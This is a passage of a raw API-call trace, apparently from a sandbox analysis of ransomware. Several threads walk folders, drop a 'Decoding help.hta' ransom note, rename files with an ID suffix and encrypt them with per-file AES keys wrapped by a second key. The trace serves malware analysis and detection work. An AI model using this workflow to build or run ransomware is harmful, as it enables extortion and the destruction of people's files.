ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.494] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.494] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.494] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x165dfd30 | out: lpFindFileData=0x165dfd30*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf9eaad0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf9eaad0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf9eaad0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0x0, dwReserved1=0x0, cFileName="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cAlternateFileName="024823~1")) returned 1 [0055.494] lstrcpyW (in: lpString1=0x10f673f0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*" [0055.494] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*") returned 90 [0055.494] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\Decoding help.hta" [0055.494] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\decoding help.hta")) returned 0xffffffff [0055.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbbc [0058.395] WriteFile (in: hFile=0xbbc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x165dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x165dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.396] CloseHandle (hObject=0xbbc) returned 1 [0058.396] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.396] lstrcmpiW (lpString1="Decoding help.hta", lpString2="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 1 [0058.396] lstrlenW (lpString="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 65 [0058.397] lstrcmpiW (lpString1="[ID]", lpString2="D91B") returned -1 [0058.397] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*" [0058.397] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*") returned 90 [0058.397] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\", lpString2="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" [0058.397] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" [0058.397] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.[ID]g9uZrLhJaygpwRm1[ID]" [0058.397] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbbc [0058.398] CreateFileMappingA (hFile=0xbbc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xbc0 [0058.398] CryptAcquireContextA (in: phProv=0x165dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x165dfcec*=0x2aac5d58) returned 1 [0060.210] CryptGenKey (in: hProv=0x2aac5d58, Algid=0x6610, dwFlags=0x1, phKey=0x165dfce8 | out: phKey=0x165dfce8*=0x5fca5a0) returned 1 [0060.210] CryptExportKey (in: hKey=0x5fca5a0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x165dfbe4, pdwDataLen=0x165dfce4 | out: pbData=0x165dfbe4*, pdwDataLen=0x165dfce4*=0x2c) returned 1 [0060.210] MapViewOfFile (hFileMappingObject=0xbc0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x180) returned 0x3a60000 [0064.260] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x165dfbe4*, pdwDataLen=0x165dfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x165dfbe4*, pdwDataLen=0x165dfcf8*=0x100) returned 1 [0064.260] CryptEncrypt (in: hKey=0x5fca5a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a60000*, pdwDataLen=0x165dfce4*=0x180, dwBufLen=0x180 | out: pbData=0x3a60000*, pdwDataLen=0x165dfce4*=0x180) returned 1 [0064.260] UnmapViewOfFile (lpBaseAddress=0x3a60000) returned 1 [0064.262] CloseHandle (hObject=0xbc0) returned 1 [0064.262] CryptDestroyKey (hKey=0x5fca5a0) returned 1 [0064.262] CryptReleaseContext (hProv=0x2aac5d58, dwFlags=0x0) returned 1 [0064.262] SetFilePointerEx (in: hFile=0xbbc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.262] WriteFile (hFile=0xbbc, lpBuffer=0x165dfbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x165dfcf8, lpOverlapped=0x0) Thread: id = 779 os_tid = 0xa04 [0054.507] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*.*", lpFindFileData=0x738fd30 | out: lpFindFileData=0x738fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8541dd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8b90 [0055.496] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.496] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x738fd30 | out: lpFindFileData=0x738fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8541dd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.496] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.496] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.496] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x738fd30 | out: lpFindFileData=0x738fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0x4f2ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIGFONT.SHX", cAlternateFileName="")) returned 1 [0055.496] lstrcpyW (in: lpString1=0x5e40ad8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*.*" [0055.496] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*.*") returned 73 [0055.496] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\Decoding help.hta" [0055.496] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\decoding help.hta")) returned 0xffffffff [0055.496] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbd4 [0058.402] WriteFile (in: hFile=0xbd4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x738fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x738fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.403] CloseHandle (hObject=0xbd4) returned 1 [0058.403] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.403] lstrcmpiW (lpString1="Decoding help.hta", lpString2="BIGFONT.SHX") returned 1 [0058.403] lstrlenW (lpString="BIGFONT.SHX") returned 11 [0058.403] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*.*" [0058.403] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*.*") returned 73 [0058.403] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\", lpString2="BIGFONT.SHX" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX" [0058.403] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX" [0058.403] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX.[ID]g9uZrLhJaygpwRm1[ID]" [0058.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\bigfont.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\bigfont.shx.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.404] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\bigfont.shx.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbd4 [0058.404] CreateFileMappingA (hFile=0xbd4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xbd8 [0058.404] CryptAcquireContextA (in: phProv=0x738fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x738fcec*=0x2aac5e68) returned 1 [0060.211] CryptGenKey (in: hProv=0x2aac5e68, Algid=0x6610, dwFlags=0x1, phKey=0x738fce8 | out: phKey=0x738fce8*=0x5fca620) returned 1 [0060.211] CryptExportKey (in: hKey=0x5fca620, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x738fbe4, pdwDataLen=0x738fce4 | out: pbData=0x738fbe4*, pdwDataLen=0x738fce4*=0x2c) returned 1 [0060.211] MapViewOfFile (hFileMappingObject=0xbd8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4f2e0) returned 0x105d0000 [0065.169] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x738fbe4*, pdwDataLen=0x738fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x738fbe4*, pdwDataLen=0x738fcf8*=0x100) returned 1 [0065.170] CryptEncrypt (hKey=0x5fca620, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x105d0000, pdwDataLen=0x738fce4*=0x4f2e0, dwBufLen=0x4f2e0) Thread: id = 780 os_tid = 0xa74 [0054.507] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*", lpFindFileData=0x166dfd30 | out: lpFindFileData=0x166dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x268abc50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x268abc50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671230 [0054.507] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.507] FindNextFileW (in: hFindFile=0x671230, lpFindFileData=0x166dfd30 | out: lpFindFileData=0x166dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x268abc50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x268abc50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.507] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.507] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.507] FindNextFileW (in: hFindFile=0x671230, lpFindFileData=0x166dfd30 | out: lpFindFileData=0x166dfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x268abc50, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x268abc50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x287054d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0054.507] lstrcpyW (in: lpString1=0x979a3d8, lpString2="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*" [0054.507] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*") returned 64 [0054.507] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\Decoding help.hta" [0054.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\Decoding help.hta" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\decoding help.hta")) returned 0x1 [0056.757] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Decoding help.hta") returned 0 [0056.757] FindNextFileW (in: hFindFile=0x671230, lpFindFileData=0x166dfd30 | out: lpFindFileData=0x166dfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0x0, dwReserved1=0x0, cFileName="directories.acrodata", cAlternateFileName="DIRECT~1.ACR")) returned 1 [0056.757] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*" [0056.757] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*") returned 64 [0056.757] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\Decoding help.hta" [0056.757] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\Decoding help.hta" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\decoding help.hta")) returned 0x1 [0058.731] lstrcmpiW (lpString1="Decoding help.hta", lpString2="directories.acrodata") returned -1 [0058.731] lstrlenW (lpString="directories.acrodata") returned 20 [0058.731] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*" [0058.731] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*") returned 64 [0058.731] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", lpString2="directories.acrodata" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" [0058.731] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" [0058.731] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.[ID]g9uZrLhJaygpwRm1[ID]" [0058.731] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.732] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83c [0058.732] CreateFileMappingA (hFile=0x83c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xd5c [0058.732] CryptAcquireContextA (in: phProv=0x166dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x166dfcec*=0x10e28350) returned 1 [0060.241] CryptGenKey (in: hProv=0x10e28350, Algid=0x6610, dwFlags=0x1, phKey=0x166dfce8 | out: phKey=0x166dfce8*=0x5da938) returned 1 [0060.241] CryptExportKey (in: hKey=0x5da938, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x166dfbe4, pdwDataLen=0x166dfce4 | out: 